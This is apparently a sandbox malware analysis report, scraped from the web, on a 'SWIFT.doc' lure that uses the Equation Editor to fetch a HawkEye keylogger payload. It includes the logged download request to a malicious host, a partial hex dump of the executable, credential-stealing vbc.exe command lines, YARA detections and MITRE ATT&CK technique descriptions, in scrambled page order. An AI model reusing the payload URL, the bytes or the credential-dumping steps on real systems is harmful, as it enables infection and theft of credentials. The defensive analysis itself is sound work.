0	192.168.2.22	49167	46.173.221.33	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Dec 14, 2020 17:49:33.631094933 CET	0	OUT	GET /izux/hktestfile.scr HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: mangero.ga Connection: Keep-Alive
Dec 14, 2020 17:49:33.682003975 CET	2	IN	HTTP/1.1 200 OK Server: nginx/1.16.1 Date: Mon, 14 Dec 2020 16:49:33 GMT Content-Length: 7447752 Connection: keep-alive Last-Modified: Mon, 14 Dec 2020 05:14:33 GMT ETag: "71a4c8-5b665b7b1b004" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 02 00 f0 b4 d6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 88 71 00 00 02 00 00 00 00 00 00 0e a6 71 00 00 20 00 00 00 c0 71 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 71 00 00 02 00 00 9a 75 72 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 a5 71 00 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 71 00 c8 18 00 00 00 c0 71 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 86 71 00 00 20 00 00 00 88 71 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 71 00 00 02 00 00 00 8a 71 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 a5 71 00 00 00 00 00 48 00 00 00 02 00 05 00 08 00 71 00 ac a5 00 00 03 00 00 00 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1a 20 00 00 00 00 2a fa fe 09 01 00 39 30 00 00 00 28 09 00 00 06 39 18 00 00 00 fe 09 00 00 72 f6 5a 00 70 fe 09 01 00 28 1c 00 00 0a 28 1d 00 00 0a 2a fe 09 00 00 fe 09 01 00 28 14 00 00 0a 2a fe 09 00 00 2a 66 fe 09 00 00 20 0f 00 00 00 5f 20 05 00 00 00 fe 02 20 00 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 05 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 06 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 07 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 08 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 0a 00 00 00 fe 01 2a 4a fe 09 00 00 20 40 00 00 00 5f 20 40 00 00 00 fe 01 2a 4a fe 09 00 00 20 10 00 00 00 5f 20 10 00 00 00 fe 01 2a a6 7f f6 00 00 04 28 0e 00 00 0a 3a 0f 00 00 00 28 25 00 00 06 73 2d 00 00 0a 80 f6 00 00 04 7f f6 00 00 04 28 0f 00 00 0a 2a a6 7f f7 00 00 04 28 0e 00 00 0a 3a 0f 00 00 00 28 26 00 00 06 73 2d 00 00 0a 80 f7 00 00 04 7f f7 00 00 04 28 0f 00 00 0a 2a 1a 28 10 00 00 0a 2a 76 28 23 00 00 06 39 0d 00 00 00 28 11 00 00 0a 20 00 00 00 00 fe 01 2a 20 00 00 00 00 2a 13 30 1e 00 77 6e 70 00 01 00 00 11 20 00 ea 0a 00 8d 0b 00 00 01 25 20 00 00 00 00 1f 4d 9c 25 20 01 00 00 00 1f 5a 9c 25 20 02 00 00 00 20 90 00 00 00 9c 25 20 03 00 00 00 16 9c 25 20 04 00 00 00 19 9c 25 20 05 00 00 00 16 9c 25 20 06 00 00 00 16 9c 25 20 07 00 00 00 16 9c 25 20 08 00 00 00 1a 9c 25 20 09 00 00 00 16 9c 25 20 0a 00 00 00 16 9c 25 20 0b 00 00 00 16 9c 25 20 0c 00 00 00 20 ff 00 00 00 9c 25 20 0d 00 00 00 20 ff 00 00 00 9c 25 20 0e 00 00 00 16 9c 25 20 0f 00 00 00 16 9c 25 20 10 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_qq q@ qur@qWqq H.textq q `.relocqq@BqHq* 90(9rZp(((*f _ J _ J _ J _ J _ J _ J @_ @J _ (:(%s-((:(&s-((v(#9( * *0wnp % M% Z% % % % % % % % % % % % % % %

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2312 Parent PID: 584

General

Start time:	17:49:39
Start date:	14/12/2020
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fb50000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2488 Parent PID: 584

General

Start time:	17:49:40
Start date:	14/12/2020
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: izux978537.scr PID: 2668 Parent PID: 2488

General

Start time:	17:49:46
Start date:	14/12/2020
Path:	C:\Users\user\AppData\Roaming\izux978537.scr
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\izux978537.scr
Imagebase:	0xbc0000
File size:	7447752 bytes
MD5 hash:	7DA4F5E17791A774131C3C97538A2495
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Analysis Process: EQNEDT32.EXE PID: 2976 Parent PID: 584

General

Start time:	17:50:06
Start date:	14/12/2020
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: izux978537.scr PID: 2308 Parent PID: 2668

General

Start time:	17:50:37
Start date:	14/12/2020
Path:	C:\Users\user\AppData\Roaming\izux978537.scr
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\izux978537.scr
Imagebase:	0xbc0000
File size:	7447752 bytes
MD5 hash:	7DA4F5E17791A774131C3C97538A2495
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: izux978537.scr PID: 3016 Parent PID: 2668

General

Start time:	17:50:40
Start date:	14/12/2020
Path:	C:\Users\user\AppData\Roaming\izux978537.scr
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\izux978537.scr
Imagebase:	0xbc0000
File size:	7447752 bytes
MD5 hash:	7DA4F5E17791A774131C3C97538A2495
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000009.00000002.2378186428.0000000002D68000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000009.00000003.2226541368.0000000004335000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000009.00000002.2376684630.0000000002C3A000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000009.00000002.2371163613.00000000002C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000009.00000002.2371163613.00000000002C0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000009.00000002.2376638694.0000000002C1E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_M00nD3vLogger, Description: Yara detected M00nD3v Logger, Source: 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000009.00000002.2378260409.0000000003B31000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000009.00000002.2378154261.0000000002D45000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: vbc.exe PID: 1492 Parent PID: 3016

General

Start time:	17:50:49
Start date:	14/12/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2915.tmp'
Imagebase:	0x400000
File size:	1170056 bytes
MD5 hash:	1672D0478049ABDAF0197BE64A7F867F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000000A.00000002.2248711261.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000A.00000002.2248711261.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: vbc.exe PID: 948 Parent PID: 3016

General

Start time:	17:50:49
Start date:	14/12/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2916.tmp'
Imagebase:	0x400000
File size:	1170056 bytes
MD5 hash:	1672D0478049ABDAF0197BE64A7F867F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SWIFT.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: HawkEye

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre